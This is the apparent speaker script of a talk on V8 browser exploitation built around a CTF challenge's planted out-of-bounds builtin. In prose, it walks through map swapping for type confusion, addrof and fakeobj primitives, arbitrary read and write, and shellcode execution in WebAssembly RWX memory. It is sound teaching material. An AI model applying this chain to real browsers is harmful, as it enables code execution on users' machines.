Welcome to my Ted Talk about Browser Exploitation. I did this because Luke linked me an article about a Dota browser exploitation vulnerability which interested me.
Also find cats in my slides.
–
Today I will be talking about
- Browser Components and Architecture
- JavaScript Engine Internals
- Identifying Vulnerabilities in Patches
- Exploiting Memory Corruption Vulnerabilities
–
To exploit browsers we first need to understand how modern day Web Browsers work. The diagram provides a high level view of browser architecture.
To start off we have the user interface, which is the top bar of the browser that users can control.
Then we have the browser engine, which marshals actions between the UI and rendering engine. It handles the interactions from the user interface, such as clicking links, submitting forms, scrolling the page etc. It also enforces security policies such as Same-Origin Policy.
The rendering engine is responsible for the actual parsing of the HTML/CSS/XML to display the webpage. It parses HTML using a tokenization algorithm, while CSS and scripts are parsed via top-down or bottom-up parsing. There are two main rendering engines - WebKit (Safari) and Gecko (Firefox) engines
There is also networking, which handles the communication to retrieve resources from other servers.
The Javascript Engine reads and executes JavaScript code and sends result to rendering engine. There are various flavour includeing V8 for Chrome, SpiderMonkey for Firefox, Nitro for Safari etc. This will be our main focus today.
The browser engine also interacts with data persistence which includes various web storage APIs such as localStorage and FileSystem to store data locally.
Finally, there is the UI Backend / Platform Integration Layer: Serves as a bridge between the browser and the underlying operating system. This includes the rendering of the actual user interface, provides access to system resources, UI controls and system-level APIs.
–
To provide a more stable and secure experience to users, browsers implemented multi-process architecture. Chrome, for example, has a dedicated process for the browser (main process), a GPU process, and a dedicated process for each tab, extension and cross-domain frame (with site isolation).
The intention of multi-process architecture is to provide stability, since if the browser runs as a single process - with all the web content, extensions, rendering in one place - if any component crashes it would affect the entire browser. Isolation of different processes via sandboxing can provide additional security that ensures malicious web content will be unable to access sensitive resources.
–
JavaScript Engines comprise of a parser, interpreter and optimizing engine(s). SpiderMonkey, ChakraCore and JSC have variations with multiple optimising engines.
JavaScript source code is initially parsed into an Abstract Syntax Tree. This is then interpreted into bytecode and executed by the machine.
–
Both the AST and bytecode are then optimised by keeping track of the code running through the interpreter (known as profiling) to determine warm and hot areas of code - code segments that are run many times. Optimisations are made against the code to improve the efficiency, or are otherwise deoptimised.
–
In V8 for example, the interpreter is called Ignition, the non-optimising compiler is called SparkPlug, and the optimising compiler is known as TurboFan.
–
Javascript Engine Internals
Before we look at memory corruption vulnerabilities, I will explain some Javascript engine concepts.
There are three common data types that are stored in computer memory - floating point doubles, SMIs (small integers) and pointers.
Javascript uses a pointer tagging mechanism - which basically means modifying the least significant bit in memory to a “1” to identify a pointer or a “0” for a SMI
In traditional 32-bit architecture, a small integer would have a 31-bit value with a “0” bit, while a pointer would have an address followed by a “1” bit.
–
Back in 2014 Chrome switched from being a 32-bit process to a 64-bit process, to improve security and efficiency.
A 64-bit architecture still requires pointer tagging in the least significant bit. However the extra bytes allowed SMIs to have 32-bits of value instead of 31-bits.
–
Eventually in 2020, pointer compression was introduced for 32-bit tagged values on 64-bit architecture to address memory inefficiencies.
The upper 32-bits of memory became the isolate root, which is the V8 heap memory space. The isolate root that is stored in the root register is simply added to the compressed 32 bit address stored in the V8 heap.
This is just good to know but pointer compression is not needed for the memory exploitation vulnerability today.
–
In JavaScript there are hidden classes, otherwise known as maps or shapes.
JavaScript objects are essentially dictionaries that have string keys mapped to their respective property attributes. For example in the bottom right image we have the string key ‘x’ mapped to the value “5”, and “y” mapped to the value “6”.
There are also some additional property attributes:
- [[Writable]] determines whether the property can be reassigned
- [[Enumerable]] determines whether the property can be in for-in loops
- [[Configurable]] determines whether the property can be deleted
–
Similarly, JavaScript Arrays are objects with string key indices that begin from ‘0’. There can be a maximum of 2^31-1 indices.
They also have the length key which automatically updates when new values are added to the array - however this property cannot be enumerated or configured.
–
As JavaScript is an interpreted language, there is a finite number of distinct objects with a unique arrangement of property keys. Multiple objects can also have the same property keys. If each object were to be stored as-is in memory, this would be greatly inefficient.
In this example we defined two objects that have the same “shape”, because they have the identical property keys and the same number of property keys.
–
Every JSObject and JSArray therefore will have a “map” or “shape” that it references to, which can then reference the property information and provide an offset value to retrieve the correct data from memory. Multiple objects can reference the same “map”.
As we will see later, controlling the “map” of an object can lead to significant consequences.
–
V8 is open source, so we can create a testing environment quite easily. We can retrieve the V8 code and build it using Google’s depot_tools, which are just a set of scripts for interacting with the Chromium Source Repositories.
We can leverage these commands to build a release and debug version of D8, which is the developers REPL for V8.
Debug has more symbols, more debugging features and more verbose output
Release is the version shipped to users
–
Identifying Vulnerabilities in Patches
One of the methods of discovering vulnerabilities in the V8 engine is to look through diff patches. For the presentation I will use an example from a CTF challenge where an out of bounds memory corruption bug is introduced as a built-in function in V8.
The diff patch has two interesting changes. The first is a modification of the bootstrapper.cc file calling SimpleInstallFunction.
–
The second is a new BUILTIN Arrayoob() function introduced in the builtins-array.cc file.
–
Built-in functions in V8 can be JavaScript functions or runtime functions in C++
Runtime functions have a %- prefix, such as %DebugPrint, which is used for debugging JavaScript code by printing the internal representation of an object or value to the console. We can enable this later in D8 using the “–allow-natives-syntax” flag.
–
SimpleInstallFunction is a runtime function that allows the creation of a new built-in function. It accepts:
- an isolate which is the current Javascript context
- proto, which is the prototype object that the new function will be added to.
- “oob”, the name of the function and some other interesting values
–
Now we can take a look at the builtins-array.cc file. This is the function that is called when the “oob” function is invoked.
First we set the unsigned 32-bit integer value len as the number of arguments provided to the function. If number of arguments provided exceeds two, return undefined
Then we create a JSReceiver object, which is the base class for JSObjects/JSArrays. The receiver is converted to an object via the Object::ToObject function.
–
The receiver object is then cast to a JSArray, and the elements of the array are cast to fixed double-point floating numbers. The array length is also initiated.
–
If only one argument is provided, element.get_scalar(length) will retrieve the floating point number at the current index. This function essentially “reads” at the location array[length].
–
If two arguments are provided (because there is an error handler for values greater than two) - a new object is created which is cast to a number. The value of the second argument is used to set a new value at array[length], before returning undefined.
–
The issue with the code is that arrays in JavaScript are zero-indexed, but the function allows read and write of array[length]. Usually, the first argument in JavaScript is “this”. As such, if we call the Array.oob() function with no explicit arguments we can read the next memory in the array, and if we pass a floating point value we can write the next memory value after the array.
–
Exploiting Memory Corruption Vulnerabilities
So by leveraging the exploit we can read and write the memory after the elements of an array index. But what is actually after an array? We can use V8 debugger to find out.
–
We can start GDB attaching to D8, and then run the REPL and allow native syntax so that we can use runtime functions. Then we can define an array with 2 elements for our example.
–
Using %DebugPrint we can investigate what a JSArray comprises of. Here we see some interesting values - “maps”, “prototypes”, “elements” etc.
–
As there is too much information, instead we can just use the GDB “x” command to provide the next four 64-bit hex values. However we have to account for pointer tagging by subtracting from the memory address. The output is read from left to right.
Comparing to the %DebugPrint output, we can determine that the first value of the JSArray is a pointer to the map or shape, then properties, elements, and then an SMI value of 2, representing the length (or number) of elements in the array.
We can follow the elements pointer in memory since we want to find out where the memory points to after the last element.
–
This time, let’s print out the next ten 64-bit hex values. The memory addresses are as follows:
We start with a pointer to the elements map, followed by the SMI (small integer) of 2, then two floating point values that we initially defined.
We realise that the memory address after the elements array is actually the map of the JSArray, which is also the memory value that our vulnerability can read + write.
–
Just to double check, we can use %DebugPrint to find the location of the JSArray, use GDB “x” function to find the map value, and then compare it to the array.oob() function, with its floating point value cast to a hex value.
–
So we can control the map of an array, which is the “shape” of an object. What can we do with it? We can potentially leak memory addresses and achieve arbitrary code execution using what is known as “JavaScript Array Type Confusion”.
–
JavaScript Array Type Confusion
Arrays are dynamically typed in Javascript, which means they can change at runtime. If an attacker can manipulate the types of elements in an array to execute malicious code.
Hypothetically we create two arrays A and B, with A as the floating point array and B is an array of objects.
–
We can leverage the out of bounds read vulnerability to obtain the maps of the two arrays, as defined by A_map and B_map.
–
We can then swap these maps using the out of bounds write, thereby causing type confusion in these arrays.
–
The first element from JSArrayA allows an attacker to retrieve the floating point memory address of a JavaScript Object. This is known as the “addrof” primitive.
The first element from JSArrayB will contain a fake object which we know the location of. This is known as a “fakeObj” primitive.
–
I have written a small example snippet of what an “addrof” and “fakeobj” primitive looks like. Due to time constraints we will carry on.
–
So now we have the “addrof” and “fakeobj” primitives. We can leverage these primitives to gain arbitrary read and write in memory.
–
Arbitrary Memory Read
Firstly, it’s important to know a special characteristic in JavaScript where access an object while it is an element of an array will not only provide the object address, but parses the object and returns the result.
Here we define a simple object with a string key “a” and a value of 1. This is then the first element of a JSArray obj_arr. When we use the %DebugPrint function - which coincidentally is the same as the “addrof” primitive, it will return the object parsing.
–
So let’s recap. Remember that the map of the JSArray is at offset + 0 and the elements pointer is at offset + 2.
If we then access the JSArray elements, we would realise that the values of the elements which we can control begin at offset + 2, and then go on for how many elements we have.
A more simplistic diagram would look like the image below.
–
What we can do is place the map of the JSArray in our first element, and then create a fake object to be treated as a floating point array.
In this example, we create a float_arr with four elements, and placed the map the first element of the exploit_arr.
–
We can then create the fake object using our “fakeobj” primitive at the offset of the JSArray - 0x20, and place the arbitrary memory address we want to read as the third element of the array.
Finally, we can just read the first element of the newly created fake object, which will provide the object address, but also parse the address and return the result.
–
Arbitrary Write
The same principle can be used to create an arbitrary write primitive. We can create the fake object, and replace the third element with the address we want to write to.
Then we can overwrite the value by calling the first element of the fake object.
–
There is an issue though - attempting to overwrite certain memory spaces result in a segmentation fault.
I’m not too sure why, but it could be a memory protection mechanism, however even so, the more modern V8 engines are immune because of pointer compression.
Remember that the upper 32-bit V8 isolate value is appended to the SMI or pointer, meaning that only memory in the V8 heap is accessible.
–
The classic route of circumventing this is to use ArrayBuffers and DataView objects.
We need to overwrite the backing store of an ArrayBuffer to gain arbitrary write.
–
So what are they?
The ArrayBuffer object is used to represent raw binary data buffer in Javascript. This is otherwise known as a byte array. The ArrayBuffer object contains a pointer reference to a backing store, which is the location where the values are stored.
A DataView object is used to direct manipulate the ArrayBuffer and perform read + write operations against it. It is generally used for binary formats such as PNG or XML.
–
We can create a new ArrayBuffer + DataView object, find the location of the ArrayBuffer and then overwrite the backing store, which is conveniently located at Offset + 0x20.
–
By doing so, we can then replace the backing store with an arbitrary address, and then use the dataview object to overwrite the value at the arbitrary address, effectively creating an arbitrary write primitive.
–
Arbitrary Code Execution
Once we have the arbitrary read and write primitives we can leverage WebAssembly pages to gain arbitrary code execution.
WebAssembly is a low level binary format that is designed to be executed in web browsers. This generally allows for higher performance.
WebAssembly allocates permissions to memory, and usually this is given “RW” - read + write permissions. If we create a WebAssembly function with “RWX” privileges, we can leverage the out of bounds vulnerability to disclose the WebAssembly memory location and write into the memory.
–
Firstly we can generate WASM code + code buffer. The code can be anything it just has to work.
This creates the wasm_instance, which contains exports object that have functions and global variable from the WebAssembly module.
–
In order to find the location to place shellcode, we need to find the base address of the RWX memory space, which is a fixed offset from the wasm_instance.
We can use “addrof” primitive to read the memory address of that object.
–
We can also use “info proc mappings” or “vmmap” to reveal the mapped address spaces, and correlate it to our wasm_instance address.
–
Then we can use JavaScript magic to find the correct offset. In this case it is 0x88.
–
Putting it all together in a script we can place the WASM code first.
–
Then we can find the location to place shellcode, which is the base address of the RWX memory location we just discovered.
–
We can then write the shellcode using our arbitrary write primitive. The dataview object will create multiple 32-bit unsigned integers when writing the shellcode.
–
We can then insert our shellcode (in this case, just /bin/sh), copy the shellcode to the base address and then execute it.
–
As shown here.
–
https://blog.infosectcbr.com.au/2020/02/pointer-compression-in-v8.html https://jhalon.github.io/chrome-browser-exploitation-1/ https://dev.to/mahmoudessam/the-architecture-of-web-browsers-1o1k https://liveoverflow.com/webkit-regexp-exploit-addrof-walk-through-browser-0x04/ https://visualgdb.com/gdbreference/commands/x https://v8.dev/blog/pointer-compression https://v8.dev/docs/builtin-functions https://sensepost.com/blog/2020/intro-to-chromes-v8-from-an-exploit-development-angle/ https://web.stanford.edu/class/archive/cs/cs107/cs107.1196/lab7/ https://wasdk.github.io/WasmFiddle/ https://xz.aliyun.com/t/5003 https://blog.logrocket.com/how-javascript-works-optimizing-the-v8-compiler-for-efficiency/ https://medium.com/web-god-mode/how-web-browsers-work-behind-the-scene-architecture-technologies-and-internal-working-fec601488bfa https://v8.dev/blog/fast-properties https://thepwnish3r.github.io/2021/11/22/Browser-Exploitation-for-n00bs.html https://chat.openai.com/chat https://blog.infosectcbr.com.au/2020/02/pointer-compression-in-v8.html https://www.freebuf.com/vuls/203721.html https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/
–
And that’s it. Thanks for listening!
